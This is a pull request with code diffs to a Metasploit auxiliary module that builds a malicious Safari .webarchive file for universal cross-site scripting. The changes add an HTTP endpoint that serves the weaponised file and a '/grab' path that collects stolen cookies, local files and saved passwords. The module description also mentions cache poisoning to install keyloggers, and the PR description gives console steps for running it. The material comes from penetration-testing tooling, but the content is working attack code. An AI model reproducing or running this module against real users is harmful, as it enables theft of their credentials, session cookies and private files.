### PR TITLE
Updates apple_safari_webarchive_uxss module to serve .webarchive as an HTTP download.

### DIFF
--- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
+++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
@@ -47,6 +47,7 @@ class Metasploit3 < Msf::Auxiliary
 		register_options(
 			[
 				OptString.new('FILENAME', [ true, 'The file name.',  'msf.webarchive']),
+				OptString.new('DOWNLOAD_URI', [ true, 'The path to download the webarhive.', '/msf.webarchive']),
 				OptString.new('URLS', [ true, 'The URLs to steal cookie and form data from.', '']),
 				OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
 				OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
@@ -151,6 +152,20 @@ class Metasploit3 < Msf::Auxiliary
 		@service_path = uopts['Path']
 		@http_service.add_resource(uopts['Path'], uopts)
 
+		# Add path to download
+		uopts = {
+			'Proc' => Proc.new { |cli, req|
+				resp = Rex::Proto::Http::Response::OK.new
+				resp['Content-Type'] = 'application/x-webarchive'
+				resp.body = @xml.to_s
+				cli.send_response resp
+			},
+			'Path' => webarchive_download_url
+		}.update(opts['Uri'] || {})
+		@http_service.add_resource(webarchive_download_url, uopts)
+
+		print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{webarchive_download_url}")
+
 		# As long as we have the http_service object, we will keep the ftp server alive
 		while @http_service
 			select(nil, nil, nil, 1)
@@ -174,9 +189,10 @@ class Metasploit3 < Msf::Auxiliary
 
 	# @return [String] contents of webarchive as an XML document
 	def webarchive_xml
-		xml = webarchive_header
-		urls.each_with_index { |url, idx| xml << webarchive_iframe(url, idx) }
-		xml << webarchive_footer
+		return @xml if not @xml.nil? # only compute xml once
+		@xml = webarchive_header
+		urls.each_with_index { |url, idx| @xml << webarchive_iframe(url, idx) }
+		@xml << webarchive_footer
 	end
 
 	# @return [String] the first chunk of the webarchive file, containing the WebMainResource
@@ -286,8 +302,9 @@ class Metasploit3 < Msf::Auxiliary
 	#    NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
 	#    [a encodeObject:response forKey:@"WebResourceResponse"];
 	def web_response_xml(script)
-		# this is a binary plist, but im too lazy to write a real encoder.
-		# ripped this straight out of a safari webarchive save.
+		# this is a serialized NSHTTPResponse, i'm too lazy to write a
+		#   real encoder so yay lets use string interpolation.
+		# ripped this straight out of a webarchive save
 		script['content-length'] = script[:body].length
 		whitelist = %w(content-type content-length date etag
 										Last-Modified cache-control expires)
@@ -709,7 +726,7 @@ class Metasploit3 < Msf::Auxiliary
 		end
 	end
 
-	# @return [Array<Array<String>>] list of URLs for remote javascripts that are cacheable
+	# @return [Array<Array<Hash>>] list of headers returned by cacheabke remote javascripts
 	def find_cached_scripts
 		cached_scripts = all_script_urls(urls).each_with_index.map do |urls_for_site, i|
 			begin
@@ -776,6 +793,11 @@ class Metasploit3 < Msf::Auxiliary
 		myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
 		port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
 		"#{proto}://#{myhost}#{port_str}"
+	end
+
+	# @return [String] URL that serves the malicious webarchive
+	def webarchive_download_url
+		@webarchive_download_url ||= datastore["DOWNLOAD_URI"]
 	end
 
 	# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen

--- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
+++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
 		register_options(
 			[
 				OptString.new('FILENAME', [ true, 'The file name.',  'msf.webarchive']),
-				OptString.new('DOWNLOAD_URI', [ true, 'The path to download the webarhive.', '/msf.webarchive']),
+				OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarhive.', '/msf.webarchive']),
 				OptString.new('URLS', [ true, 'The URLs to steal cookie and form data from.', '']),
 				OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
 				OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
@@ -797,7 +797,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	# @return [String] URL that serves the malicious webarchive
 	def webarchive_download_url
-		@webarchive_download_url ||= datastore["DOWNLOAD_URI"]
+		datastore["DOWNLOAD_PATH"]
 	end
 
 	# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen

--- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
+++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
@@ -24,8 +24,9 @@ class Metasploit3 < Msf::Auxiliary
 				in Safari's .webarchive file format. The format allows you to
 				specify both domain and content, so we can run arbitrary script in the
 				context of any domain. This allows us to steal cookies, file URLs, and saved
-				passwords from any website we want. On sites that link to cached javascripts,
-				we can poison the user's browser cache and install keyloggers.
+				passwords from any website we want -- in other words, it is a universal
+				cross-site scripting vector (UXSS). On sites that link to cached javascripts,
+				we can additionally poison user's browser cache and install keyloggers.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         => 'joev',
@@ -48,7 +49,8 @@ class Metasploit3 < Msf::Auxiliary
 			[
 				OptString.new('FILENAME', [ true, 'The file name.',  'msf.webarchive']),
 				OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarhive.', '/msf.webarchive']),
-				OptString.new('URLS', [ true, 'The URLs to steal cookie and form data from.', '']),
+				OptString.new('URLS', [ true, 'A space-delimited list of URLs to UXSS (eg http//browserscan.rapid7.com/']),
+				OptString.new('URIPATH', [false, 'The URI to receive the UXSS\'ed data', '/grab']),
 				OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
 				OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
 				OptBool.new('STEAL_FILES', [true, "Enable local file stealing.", true]),


### PR DESCRIPTION
Verify:

```
$> use auxiliary/gather/apple_safari_webarchive_uxss
$> set URLS https://browserscan.rapid7.com
$> set DOWNLOAD_PATH /download.webarchive
$> rexploit
```

You should be able to go http://localhost:8080/download.webarchive to download the webarchive. After opening the .webarchive file in Safari you should see the captured data in your console.
